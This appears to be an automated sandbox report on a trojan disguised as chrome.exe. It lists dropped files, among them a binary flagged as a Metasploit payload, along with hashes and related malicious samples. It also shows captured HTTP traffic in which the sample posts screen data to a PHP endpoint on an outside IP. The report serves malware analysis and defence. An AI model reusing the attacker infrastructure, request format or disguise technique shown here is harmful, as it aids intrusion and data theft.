                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:chrome.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@16/4@0/2
                EGA Information:
                • Successful, ratio: 33.3%
                HDC Information:
                • Successful, ratio: 66.3% (good quality ratio 43.6%)
                • Quality average: 33%
                • Quality standard deviation: 31.7%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 34
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): audiodg.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Execution Graph export aborted for target chrome.exe, PID 5612 because it is empty
                • Execution Graph export aborted for target chrome.exe, PID 5780 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:47:13Task SchedulerRun new task: WinTask path: C:\Users\user\Desktop\chrome.exe
                15:47:17API Interceptor2x Sleep call for process: chrome.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                DIGITALOCEAN-ASNUSaS5q94Hr72.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                mips-20230711-1121.elfGet hashmaliciousMirai, MoobotBrowse
                • 134.122.107.40
                Prijsaanvraag_(Katholieke_Universiteit_Leuven.exeGet hashmaliciousGuLoader, LokibotBrowse
                • 138.68.56.139
                Demande_de_devis_(Universite_Paris_Cite_2307E.exeGet hashmaliciousGuLoader, LokibotBrowse
                • 138.68.56.139
                SFILEMBDOWN_D2zAJuzTqcTMUUGJaN802V5EQErviowPq558#U00aexrlsk.msiGet hashmaliciousUnknownBrowse
                • 142.93.100.140
                Richiesta_Preventivo_(ISGB)_7788EU_-_0605ITA#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                • 138.68.56.139
                gCfJZyW5P9y6kQ6.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                TNT_Express_1Z3136W7049359723.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                FedEx_Receipt_71310373717.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                DHL_Receipt_AWB8114550418778.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                FedEx_Receipt_72310373717.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                DHL_Receipt_AWB8114770418778.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                gbzgfumjtV.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                4A2KE7woIs.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                Facturas_Pagadas_al_Vencimiento.PDF.exeGet hashmaliciousFormBookBrowse
                • 128.199.218.78
                DHL_Express_AWB#3020098038.exeGet hashmaliciousLokibotBrowse
                • 138.68.56.139
                https://1xwin.betGet hashmaliciousUnknownBrowse
                • 134.122.54.186
                Downloa_FIL_3vf5iTDDfg0eAy8jpo9MreZxNTG8ELsdfgsdfgWERK70#U00aexlsk.msiGet hashmaliciousUnknownBrowse
                • 142.93.100.140
                https://7xqcio7f.page.link/NLtkGet hashmaliciousUnknownBrowse
                • 134.122.57.34
                https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fresgianyar.bali.polri.go.id%2Fc2ss%2Fadmine%2F15%2F%2F%2F%2FY2hlcmFsZWUua2F0dGVuYnVyZ0BhbGdvbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                • 164.90.228.169

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome.exe.log

                Download File
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1492
                Entropy (8bit):5.372936244823406
                Encrypted:false
                SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhwE4iUKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AowHiUtHt
                MD5:4D233D278CCA82225C230BD444D139F2
                SHA1:DBBEF20096B07EAD12697D9DDE4D8E6FEAB89EA1
                SHA-256:DF38254760ABB2BC4CFB7FA345D82952DEE4471099065773A386EF4EC5073687
                SHA-512:702A4C13BEBCA9045BCBEB8CDCE6F302E88A764101992E700E49CD2BA872AB91F0CA8C3A01AC07BC320F01FA3C145A9EBFCC368DBE440873DB7C4AC4950A7F6E
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                C:\Users\user\AppData\Local\Temp\cgse4azb.lmk

                Download File
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                Category:dropped
                Size (bytes):84456
                Entropy (8bit):7.899562735115553
                Encrypted:false
                SSDEEP:1536:C5IBOvUa5r3vjZ5MN9wT7NLKnyPjPTv6SpW0gkZcQn17t3bvoygKceDSs5OV3kt5:yI8ljvj4ETRLKyHydSf17B39DSGOatoi
                MD5:CD154F131C1080CDCA69476044A96D40
                SHA1:C7820235850D14CBB2D22C836ACE3D9A23985D60
                SHA-256:B6865AC4479DD3D8D024FF79030F0A3FDEE0F7A778E84AEA76991168483F9E56
                SHA-512:23EF0AAD0E8A1443EE75A28EF2B9C337FEE31F10B5EE37203A712CB8DB297DE4E717E5FFE9EB2551C5DB9DBBCF9A4ED76011E8AE2DCA4B9DFE2C9B1CA24DA3E1
                Malicious:false
                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....

                C:\Users\user\AppData\Local\Temp\rf2vtycg.4mn

                Download File
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                Category:dropped
                Size (bytes):89439
                Entropy (8bit):7.907715148464475
                Encrypted:false
                SSDEEP:1536:C5IBOvUa5r3vjZ5MN9wT7NLKnyPjPTv6SpW0gkZcQn17t3bvoygKceDSs52E9jTT:yI8ljvj4ETRLKyHydSf17B39DSGl1T4m
                MD5:FDA04654A1B484198A0B2A9F1D6DBC42
                SHA1:D396035743859EF42F0D0368E2F4BEB7E0560629
                SHA-256:374DF70FB11C5B0001116ACE790BD08702D1905AA39F0C96B3070D0E0D5B2EAA
                SHA-512:75C784848E609EAA5DE4B419C105D749C35090DC3E9B6DC1A80D4A2C353E8D5F436A0D86EF5990CA1C7497A430125BAEAAA67EB0214726FBDC5FCFE61DE2A3EB
                Malicious:false
                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....

                C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe

                Download File
                Process:C:\Users\user\Desktop\chrome.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):7168
                Entropy (8bit):1.4900071764412044
                Encrypted:false
                SSDEEP:24:eFGStrJ9u0/6PuU/knZdEBQAVbYfwKLqIGeNDMSCzC/V1ilg9HeH5m+ipmB:is0b0IEBQToHSD9CmtolgJe8SB
                MD5:468F9575A65D99F52FA2B52C505F59A6
                SHA1:BACB70F9A8ABDA0E15DA98A2289F3ED26062DA83
                SHA-256:7E0B5396F1F00177E19B7887137DCC314DCCEE09F5855C1B6A60129C65310A24
                SHA-512:D701FCD45B785CCFDD60E0BF3829479C41EA52CDDFC84078F1EFE19340A82041137E66FD4F95AB0772E1821554297D7DA482EA4E0502386643B576F073B52094
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_MetasploitPayload_2, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=.|E..t=.|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@.............................C..H............................................................B..l............................C.......................................................0...............................text...N........................... ..`.rdata.......0......................@..@.ftrs........@...................... ...................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.92887671203156
                TrID:
                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                • Win64 Executable GUI (202006/5) 46.43%
                • Win64 Executable (generic) (12005/4) 2.76%
                • Generic Win/DOS Executable (2004/3) 0.46%
                • DOS Executable Generic (2002/1) 0.46%
                File name:chrome.exe
                File size:1'142'288 bytes
                MD5:b2eaf44f5d0ea664e504c9c8c6c42d23
                SHA1:c79f1dccf4aa3a973f9a5ad54e6f0d9497066971
                SHA256:8897994e897bb1b2d22188d332ea972eff725b3b02b9dab0e5b5e73ab60d79c4
                SHA512:d8287aa71ebac553d09ea1bb8665cb2b8f60686ab20e96250f859fc215c69f72d807a9516c38d9ccf6a045348c2fb9fe3bf3bed2e9622ae2dd6e9910178c995b
                SSDEEP:6144:YLrHrk/uujGA3z6Ed1w7dgEMMMM7MMMM7MMMM7MMMM7MMMM7MMMM7MMMM7MMMM7U:UH4/uuj96MC7d8
                TLSH:6335C053542E8F52D67957F8BE470A7F9F31166DD8C2289E225B0D833E617A384CE02E
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Pd.........."...0..>............... .....@..... ....................................`...@......@............... .....

                File Icon

                Icon Hash:0733c9ccccc94307

                Static PE Info

                General

                Entrypoint:0x140000000
                Entrypoint Section:
                Digitally signed:false
                Imagebase:0x140000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x6450F1D3 [Tue May 2 11:19:47 2023 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:

                Entrypoint Preview

                Instruction
                dec ebp
                pop edx
                nop
                add byte ptr [ebx], al
                add byte ptr [eax], al
                add byte ptr [eax+eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x2c02.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x113cb80x113e00False0.16893956020616221data7.939923426280949IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x1160000x2c020x2e00False0.30825407608695654data4.950463504743286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x1161300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.29896265560165974
                RT_GROUP_ICON0x1186d80x14data1.15
                RT_VERSION0x1186ec0x32cdata0.4273399014778325
                RT_MANIFEST0x118a180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 11, 2023 15:47:15.393855095 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:15.587534904 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.587662935 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:15.589050055 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:15.782777071 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.782804966 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.797589064 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:15.991235018 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.991264105 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.991277933 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.991292000 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:15.991466999 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:16.185045004 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185070038 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185086966 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185101032 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185113907 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185169935 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185184956 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185230017 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.185245037 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.186331034 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.198899031 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:16.198977947 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:16.392694950 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392721891 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392736912 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392751932 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392797947 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392813921 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392827988 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392843008 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392857075 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392911911 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392971992 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392986059 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.392999887 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.393014908 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.393030882 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.393045902 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.393913031 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:16.587497950 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.587522984 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.587537050 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.587546110 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.587832928 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.587852955 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588099003 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588114023 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588187933 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588202953 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588216066 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.588228941 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.816745043 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:16.859309912 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:16.962865114 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:17.156748056 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370687008 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370728970 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370748997 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370767117 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370786905 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370805025 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370822906 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370841980 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370857954 CEST8049690128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:17.370940924 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:17.370979071 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:17.827130079 CEST4969080192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:17.857606888 CEST49691443192.168.2.4104.248.194.233
                Jul 11, 2023 15:47:17.857702017 CEST44349691104.248.194.233192.168.2.4
                Jul 11, 2023 15:47:17.857875109 CEST49691443192.168.2.4104.248.194.233
                Jul 11, 2023 15:47:19.009354115 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.000415087 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.171595097 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.171940088 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.173682928 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.344811916 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.345010042 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.348160982 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.519382000 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.519423008 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.519557953 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.519619942 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.690651894 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.690681934 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.690696001 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.690711021 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.690756083 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.690809011 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.690809011 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.861804962 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861844063 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861865997 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861886024 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861896038 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.861905098 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861922979 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861943960 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861970901 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.861996889 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.862067938 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:22.903727055 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:22.903913021 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:23.033344984 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033381939 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033400059 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033421040 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033438921 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033457041 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033476114 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033493042 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033510923 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033529043 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.033576965 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:23.033658981 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:23.075061083 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.204967976 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205038071 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205064058 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205084085 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205106974 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205125093 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205142975 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205161095 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205180883 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205198050 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205216885 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205236912 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205581903 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205602884 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205616951 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205631018 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205645084 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205658913 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205672026 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205686092 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205698967 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205712080 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205724955 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.205738068 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.434360981 CEST8049692128.199.113.162192.168.2.4
                Jul 11, 2023 15:47:23.484831095 CEST4969280192.168.2.4128.199.113.162
                Jul 11, 2023 15:47:23.579682112 CEST4969280192.168.2.4128.199.113.162

                HTTP Request Dependency Graph

                • 128.199.113.162

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.449690128.199.113.16280C:\Users\user\Desktop\chrome.exe
                TimestampkBytes transferredDirectionData
                Jul 11, 2023 15:47:15.589050055 CEST0OUTPOST /upwawsfrg.php HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Content-Length: 126665
                Expect: 100-continue
                Connection: Keep-Alive
                Jul 11, 2023 15:47:15.782804966 CEST0INHTTP/1.1 100 Continue
                Jul 11, 2023 15:47:15.797589064 CEST13OUTData Raw: 4e 61 6d 65 3d 73 63 72 65 65 6e 26 64 61 74 61 46 69 6c 65 3d 46 38 25 32 66 64 25 32 66 48 35 4a 58 65 5a 4d 41 6b 4c 30 74 30 32 5a 50 39 6e 56 73 7a 31 59 65 48 34 71 44 52 38 32 54 74 52 6b 63 50 53 33 41 31 37 69 25 32 62 44 25 32 62 65 57
